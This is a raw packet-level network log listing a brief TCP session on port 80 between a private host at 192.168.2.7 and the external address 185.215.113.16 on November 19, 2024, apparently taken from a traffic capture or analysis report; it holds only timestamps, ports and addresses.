Nov 19, 2024 21:02:38.444550991 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.444574118 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.444644928 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444655895 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444665909 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444684029 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.444689035 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444732904 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.444844961 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444856882 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444868088 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444885969 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.444888115 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.444932938 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447364092 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447395086 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447406054 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447436094 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447746992 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447757959 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447768927 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447787046 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447791100 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447818041 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447886944 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447896957 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447906971 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447918892 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447923899 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447930098 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447941065 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447951078 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447952032 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447962046 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447973013 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.447978020 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.447999954 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.448005915 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.448386908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.448429108 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.448440075 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.448451996 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.448465109 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.448488951 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.487783909 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487806082 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487817049 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487837076 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487848043 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487859011 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487869978 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.487891912 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.487931967 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488014936 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488114119 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488126040 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488127947 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488137007 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488151073 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488168001 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488184929 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488334894 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488346100 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488356113 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488365889 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488377094 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488378048 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488392115 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488399982 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488431931 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488826990 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488838911 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488848925 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488859892 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488871098 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488873005 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488898039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488917112 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488925934 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488935947 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488946915 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.488962889 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.488987923 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489154100 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489165068 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489175081 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489186049 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489195108 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489196062 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489207029 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489216089 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489218950 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489228964 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489238977 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489239931 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489250898 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489279032 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489640951 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489653111 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489662886 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489684105 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489809036 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489820957 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489830971 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489841938 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489850998 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489856005 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489861965 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489873886 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489876032 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489883900 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.489893913 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.489969015 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490135908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490175009 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490235090 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490246058 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490256071 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490267038 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490278006 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490283966 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490288973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490307093 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490323067 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490753889 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490766048 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490775108 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490786076 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490793943 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490797043 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490807056 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490818024 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490829945 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490834951 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490840912 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490850925 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490864992 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490870953 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490874052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490885019 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490886927 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490895987 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490906954 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490909100 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490919113 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490925074 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.490930080 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.490969896 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.491648912 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491661072 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491671085 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491688013 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491697073 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491702080 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.491708994 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.491710901 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.491743088 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.530771017 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530797958 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530808926 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530860901 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.530903101 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.530963898 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530975103 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530987978 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.530999899 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531012058 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531047106 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531132936 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531270027 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531280994 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531332970 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531373978 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531384945 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531400919 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531413078 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531419039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531440020 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531717062 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531728983 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531739950 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531750917 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531764030 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531774044 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531853914 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531891108 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531903028 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.531922102 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.531955957 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.533869982 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534017086 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534028053 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534039974 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534049988 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534061909 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534073114 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534076929 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534121037 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534153938 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534166098 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534176111 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534194946 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534198999 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534209967 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534219980 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534220934 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534230947 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534251928 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534282923 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534697056 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534708977 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534718990 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534729958 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534737110 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534739971 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534750938 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534761906 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.534771919 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.534796000 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.575709105 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575771093 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.575783014 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575803995 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575814962 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575828075 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575839043 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575850010 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.575860023 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575896025 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.575939894 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575952053 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575963974 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575974941 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.575989962 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.575989962 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576009989 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576294899 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576306105 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576327085 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576337099 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576348066 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576384068 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576384068 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576395035 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576406002 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576417923 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576427937 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576457977 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576631069 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576642036 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576661110 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576682091 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576689959 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576723099 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576834917 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576845884 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576855898 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576867104 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.576879025 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.576913118 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577080965 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577091932 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577102900 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577142954 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577228069 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577238083 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577249050 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577259064 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577266932 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577269077 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577280998 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577287912 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577300072 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577550888 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577655077 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577697039 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577765942 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577775002 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577780962 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577786922 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577811956 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577892065 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577902079 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577913046 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.577950001 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.577950001 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.578152895 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578207016 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578217030 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578260899 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578267097 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578273058 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578279018 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578347921 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.578370094 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578474045 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578484058 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578494072 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578511953 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.578525066 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.578664064 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578675032 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578686953 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578697920 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.578700066 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.578727007 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579045057 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579056025 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579066038 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579076052 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579087973 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579092979 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579099894 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579124928 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579181910 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579193115 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579216957 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579353094 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579396009 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579407930 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579416990 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579452991 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579554081 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579564095 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579575062 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579586029 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.579596043 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.579662085 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.586707115 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.618000984 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618055105 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618066072 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618084908 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618096113 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618098974 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.618107080 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618118048 CET	80	49840	185.215.113.16	192.168.2.7
Nov 19, 2024 21:02:38.618120909 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.618171930 CET	49840	80	192.168.2.7	185.215.113.16
Nov 19, 2024 21:02:38.618225098 CET	80	49840	185.215.113.16	192.168.2.7
